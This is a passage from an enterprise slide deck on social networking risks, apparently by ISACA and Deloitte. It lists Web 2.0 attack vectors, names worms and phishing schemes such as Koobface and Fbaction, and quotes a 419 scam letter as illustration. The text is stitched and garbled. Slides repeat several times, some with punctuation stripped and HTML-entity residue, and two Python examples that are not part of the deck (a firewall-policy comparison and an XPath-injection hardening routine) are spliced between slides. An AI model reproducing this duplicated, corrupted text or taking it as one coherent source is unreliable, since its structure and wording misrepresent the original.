  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — inject JavaScripts into the RSS feeds to generate attack on client browser
  – Web Services Definition Language (“WSDL”) scanning and enumeration
  – Client-side validation in AJAX routines — fail to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP message — bypass authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
Slide 37: Risks and challenges (cont.)
• Example worms / phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account
Slide 38: Risks and challenges (cont.)
  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user’s Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
• Common element – they all take advantage of the implied trust that social networking users have with each other
Slide 39: Risks and challenges (cont.)
“Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening.” – Marcus Ranum in InfoSec Magazine, May 2008
• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• May also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc.
Slide 40: Risks and challenges (cont.)
• More on phishing — social networks are a target rich environment
Slide 41: Risks and challenges (cont.)
• More on phishing — social networks are a target rich environment (cont.)
“Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now; i was born on the 1st of January 1986 to the family of Kone. My father’s name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year…” – See http://www.419legal.org for more details
• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
Slide 42: Risks and challenges (cont.)
• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the proprietor
• Intellectual Property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium
Slide 43: Risks and challenges (cont.)
• Failures in the use of Social Media — most companies that use Social Media don’t approach it the way they would with other mission critical technology
  – At best it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren’t fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
“Fully half of all Social Media investments will fail” — Gartner
Slide 44: Risks and challenges (cont.)
“When I discovered YouTube, I didn't work for five days. I did nothing. I viewed ‘cookie monster sings chocolate rain’ about 1000 times.” – Michael Scott from The Office
• Productivity — Users employ social media tools for nonproductive purposes such as socializing (“Social Notworking”)
http://news.bbc.co.uk/2/hi/business/8325865.stm
Slide 45: Risks and challenges (cont.)
• Technical Integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with:
    • Facebook
    • Twitter
    • Myspace
    • Yahoo
    • Google
    • Windows Live ID
    • AOL
    • Blogger
    • WordPress
    • Netlog
    • OpenID
    • flickr
Slide 46: Risks and challenges (cont.)
• Information hoarding — In many industries value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom’s law, which states that — “The value of a network equals the net value of each user’s transactions conducted through that network, valued from the perspective of each user and summed for all”
  Or alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law
Slide 47: Risks and challenges (cont.)
• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation issues
Slide 48: A quick word on privacy
“People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time.”
— Mark Zuckerberg, Facebook founder
“If you have something that you don’t want anyone to know, maybe you shouldn’t be doing it in the first place.”
— Eric Schmidt, CEO, Google Inc.
Slide 49: A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence: limited attempt to address
Slide 50: Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Define consequences for failure to comply, e.g. “termination of employment and legal action”
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
Slide 51: Responding to the risks and challenges
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
Slide 52: Responding to the risks and challenges (cont.)
• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology that offers granular control of social networking functionality
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real-time
    • Visibility and policy control over application access
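The port-versus-application point above, as an added example (not code from the deck or from any firewall vendor): a small Python policy check run over constructed proxy-log lines, using a hypothetical application catalogue and a hypothetical per-group acceptable-use policy, to show that a port-80/443 rule allows every social-networking flow while an application-aware rule can enforce the policy per user.

```python
"""Added example: port-based vs application-aware policy on proxy logs.
All log lines, signatures, groups and policy below are constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed web-proxy log lines: user, source IP, destination host, port.
SAMPLE_LOG = """\
alice 10.1.2.3 www.facebook.com 443
bob 10.1.2.4 api.twitter.com 443
carol 10.1.2.5 intranet.example.com 443
dave 10.1.2.6 apps.facebook.com 80
erin 10.1.2.7 www.linkedin.com 443
frank 10.1.2.8 fbcdn.net 443
"""

# Hypothetical application catalogue: an application-aware firewall
# identifies traffic by destination and content, not by port number.
APP_SIGNATURES = {
    "facebook.com": "facebook",
    "fbcdn.net": "facebook",
    "twitter.com": "twitter",
    "linkedin.com": "linkedin",
}

# Hypothetical user groups and acceptable-use policy (group -> allowed apps).
GROUPS = {"alice": "marketing", "bob": "marketing", "carol": "engineering",
          "dave": "engineering", "erin": "hr", "frank": "engineering"}
APP_POLICY = {
    "marketing": {"facebook", "twitter", "linkedin"},
    "hr": {"linkedin"},
    "engineering": set(),
}


@dataclass(frozen=True)
class Flow:
    user: str
    src_ip: str
    host: str
    port: int


LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\d+)$")


def parse_log(text: str) -> list[Flow]:
    """Parse the constructed log format; malformed lines are skipped."""
    flows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            flows.append(Flow(m.group(1), m.group(2), m.group(3), int(m.group(4))))
    return flows


def identify_app(host: str) -> str:
    """Map a host to an application by exact or dotted-suffix match.
    'notfacebook.com' must not match 'facebook.com', hence the '.' check."""
    host = host.lower()
    for suffix, app in APP_SIGNATURES.items():
        if host == suffix or host.endswith("." + suffix):
            return app
    return "web"


def port_policy(flow: Flow) -> str:
    """Legacy rule: anything on 80/443 is allowed, everything else denied."""
    return "allow" if flow.port in (80, 443) else "deny"


def app_policy(flow: Flow) -> str:
    """Application-aware rule: decision depends on the user's group and app."""
    app = identify_app(flow.host)
    if app == "web":
        return "allow"          # ordinary web traffic stays allowed
    allowed = APP_POLICY.get(GROUPS.get(flow.user, ""), set())
    return "allow" if app in allowed else "deny"


def compare_policies(text: str) -> dict[str, tuple[str, str]]:
    """Per user: (port-based decision, application-aware decision)."""
    return {f.user: (port_policy(f), app_policy(f)) for f in parse_log(text)}


if __name__ == "__main__":
    for user, (by_port, by_app) in compare_policies(SAMPLE_LOG).items():
        print(f"{user:6} port-rule={by_port:5} app-rule={by_app}")
```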
Slide 53: What is next in the world of social networking
Slide 54: Where we are at today
• Enterprise Social Media has crossed the tipping point and is no longer considered an “emerging” technology
“The Hype Cycle” http://en.wikipedia.org/wiki/Hype_cycle
Slide 55: What’s next in the world of social networking
• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social Networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car’s navigation system will be able to learn your friend’s location and provide directions to them
Slide 56: Some further predictions
• Some quotes on social networks
  – “Probably the greatest transformative force in our generation, absent a major war” — Mark Zuckerberg, Facebook founder
  – “(Twitter is)… Something important that has the potential to change the world, though we have a long way to go” — Biz Stone, Co-founder of Twitter
Slide 57: Q&A
Slide 58: Today’s Presenters
Nelson Gibbs, Senior Manager, AERS – Audit & Enterprise Risk Services, Deloitte & Touche LLP, ngibbs@deloitte.com, +1 213 593 4241
Slide 59: Appendix
• Additional resources
  – Gopal, Raj, et al. “Web 2.0 reinvents corporate networking”, Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – “Great Wall of Facebook: The Social Network’s Plan to Dominate the Internet — and Keep Google Out” by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – “The Future is Social, Not Search, Facebook COO Says” by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
Slide 60:
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
www.isaca.org | 52

Responding to the risks and challenges (cont.)

• Vulnerability assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that social networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
www.isaca.org | 53

What is next in the world of social networking
www.isaca.org | 54

Where we are at today

• Enterprise social media has crossed the tipping point and is no longer considered an “emerging” technology

“The Hype Cycle” — http://en.wikipedia.org/wiki/Hype_cycle
www.isaca.org | 55

What’s next in the world of social networking

• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, an increase of more than 400% over the 2009 figure of 140 million (Source — eMarketer)
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car’s navigation system will be able to learn your friend’s location and provide directions to them
www.isaca.org | 56

Some further predictions

• Some quotes on social networks
  – “Probably the greatest transformative force in our generation, absent a major war.” — Mark Zuckerberg, Facebook founder
  – “(Twitter is)… something important that has the potential to change the world, though we have a long way to go.” — Biz Stone, co-founder of Twitter
www.isaca.org | 57

Q&A
www.isaca.org | 58

Today’s Presenters

Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
www.isaca.org | 59

Appendix

• Additional resources
  – Gopal, Raj et al., “Web 2.0 reinvents corporate networking”, Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – “Wall of Facebook: The Social Network’s Plan to Dominate the Internet — and Keep Google Out” by Fred Vogelstein, Wired Magazine (June 2009) — http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – “The Future is Social, Not Search, Facebook COO Says” by Ryan Singel, Wired Magazine (October 2009) — http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
www.isaca.org | 60

This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax, or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.

Deloitte, its affiliates, and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
www.isaca.org | 34

Risks and challenges
www.isaca.org | 35

Risks and challenges

• Farmers and Mobsters
  – Top Facebook applications
    • Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                     Monthly Active Users
   1  FarmVille                          82,580,911
   2  Static FBML                        46,827,021
   3  Birthday Cards                     41,904,049
   4  Café World                         30,032,716
   5  Facebook for iPhone                29,438,848
   6  Texas HoldEm Poker                 28,332,917
   7  Slide FunSpace                     25,630,033
   8  Happy Aquarium (BETA)              24,915,971
   9  Mafia Wars                         24,704,179
  10  Causes                             24,317,292
www.isaca.org | 36

Risks and challenges (cont.)

• New security concerns and attack vectors — a result of the shift in technology toward Web services that empower server-side core technology components, as well as Asynchronous JavaScript and XML (“AJAX”) and Rich Internet Application (“RIA”) clients that enhance client-end interfaces in the browser itself
• Top 10 Web 2.0 attack vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting (“CSS”) in AJAX, e.g. the “Samy worm that exploited MySpace.com’s CSS flaw”
  – XML poisoning — poisoned XML blocks coming from the AJAX client
  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — inject JavaScript into RSS feeds to generate an attack on the client browser
  – Web Services Definition Language (“WSDL”) scanning and enumeration
  – Client-side validation in AJAX routines — failure to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP message — bypass of authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
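Two of the listed vectors, XPath injection in a SOAP message and client-side-only validation, share a root cause: the server splices caller-supplied text into a query as if it were syntax and trusts that the browser already checked it. As an added illustration that is not part of the presentation, the Python below (its user store, names and functions are constructed for this example) shows the concatenation pattern beside a builder that quotes the value as an XPath string literal, and an authentication step that keeps the secret out of the query entirely.

```python
"""Hardening an XML/SOAP-backed login lookup against XPath injection.

Constructed example: the user store, account names and function names
are invented for illustration and are not from the presentation.
"""
import hashlib
import hmac
import xml.etree.ElementTree as ET


def unsafe_lookup_xpath(name: str) -> str:
    """The pattern the slide warns about: the caller-supplied value is
    spliced straight into the query, so a quote character in it ends
    the literal early and the remainder is read as XPath syntax."""
    return f".//user[name='{name}']"


def xpath_literal(value: str) -> str:
    """Quote an arbitrary string as an XPath 1.0 string literal.

    XPath has no escape character, so a value containing one quote type
    is wrapped in the other, and a value containing both is assembled
    with concat() so that no quote can terminate a literal early."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"


def safe_lookup_xpath(name: str) -> str:
    """Same query, with the value carried as data rather than syntax."""
    return f".//user[name={xpath_literal(name)}]"


def password_hash(password: str) -> str:
    # Unsalted SHA-256 keeps the example short; a real service would use
    # a password KDF (scrypt, argon2, bcrypt) with a per-user salt.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def build_store(accounts: dict) -> ET.Element:
    """Constructed sample user store in the shape a SOAP backend might keep."""
    root = ET.Element("users")
    for name, password in accounts.items():
        user = ET.SubElement(root, "user")
        ET.SubElement(user, "name").text = name
        ET.SubElement(user, "pwhash").text = password_hash(password)
    return root


def find_user(root: ET.Element, name: str):
    """Server-side lookup by exact name using the safely quoted literal.

    ElementTree's XPath subset accepts the single- and double-quoted
    forms; the concat() form needs a full XPath 1.0 engine such as lxml."""
    return root.find(safe_lookup_xpath(name))


def authenticate(root: ET.Element, name: str, password: str) -> bool:
    """Authenticate without ever placing the secret in the query: locate
    the account by name, then compare the stored hash in constant time.
    Whatever the browser-side script validated, this check runs again here."""
    user = find_user(root, name)
    if user is None:
        return False
    stored = user.findtext("pwhash", default="")
    return hmac.compare_digest(stored, password_hash(password))


if __name__ == "__main__":
    store = build_store({"alice": "s3cret", "o'neil": "hunter2"})
    print(unsafe_lookup_xpath("o'neil"))  # the apostrophe breaks the literal
    print(safe_lookup_xpath("o'neil"))    # value wrapped in double quotes
    print(authenticate(store, "alice", "s3cret"))
    print(authenticate(store, "o'neil", "wrong"))
```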
www.isaca.org | 37

Risks and challenges (cont.)

• Example worms and phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account
www.isaca.org | 38

Risks and challenges (cont.)

  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user’s Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
• Common element – they all take advantage of the implied trust that social networking users have with each other
www.isaca.org | 39

Risks and challenges (cont.)

“Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening.” – Marcus Ranum in InfoSec Magazine, May 2008

• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• These attacks may also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc.
www.isaca.org | 40

Risks and challenges (cont.)

• More on phishing — social networks are a target-rich environment
www.isaca.org | 41

Risks and challenges (cont.)

• More on phishing — social networks are a target-rich environment (cont.)

“Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father’s name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year……” – See http://www.419legal.org for more details

• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
www.isaca.org | 42

Risks and challenges (cont.)

• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the proprietor
• Intellectual property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium
www.isaca.org | 43

Risks and challenges (cont.)

• Failures in the use of social media — most companies that use social media don’t approach it the way they would other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with social media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren’t fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail

“Fully half of all social media investments will fail.” — Gartner
www.isaca.org | 44

Risks and challenges (cont.)

“When I discovered YouTube, I didn't work for five days. I did nothing. I viewed ‘Cookie Monster sings Chocolate Rain’ about 1000 times.” – Michael Scott from The Office

• Productivity — Users employ social media tools for nonproductive purposes such as socializing (“Social Notworking”)
  http://news.bbc.co.uk/2/hi/business/8325865.stm
www.isaca.org | 45

Risks and challenges (cont.)

• Technical integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with:
    • Facebook
    • Twitter
    • Myspace
    • Yahoo
    • Google
    • Windows Live ID
    • AOL
    • Blogger
    • WordPress
    • Netlog
    • OpenID
    • flickr
www.isaca.org | 46

Risks and challenges (cont.)

• Information hoarding — In many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom’s law, which states that — “The value of a network equals the net value of each user’s transactions conducted through that network, valued from the perspective of each user, and summed for all”
    Or alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law
www.isaca.org | 47

Risks and challenges (cont.)

• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
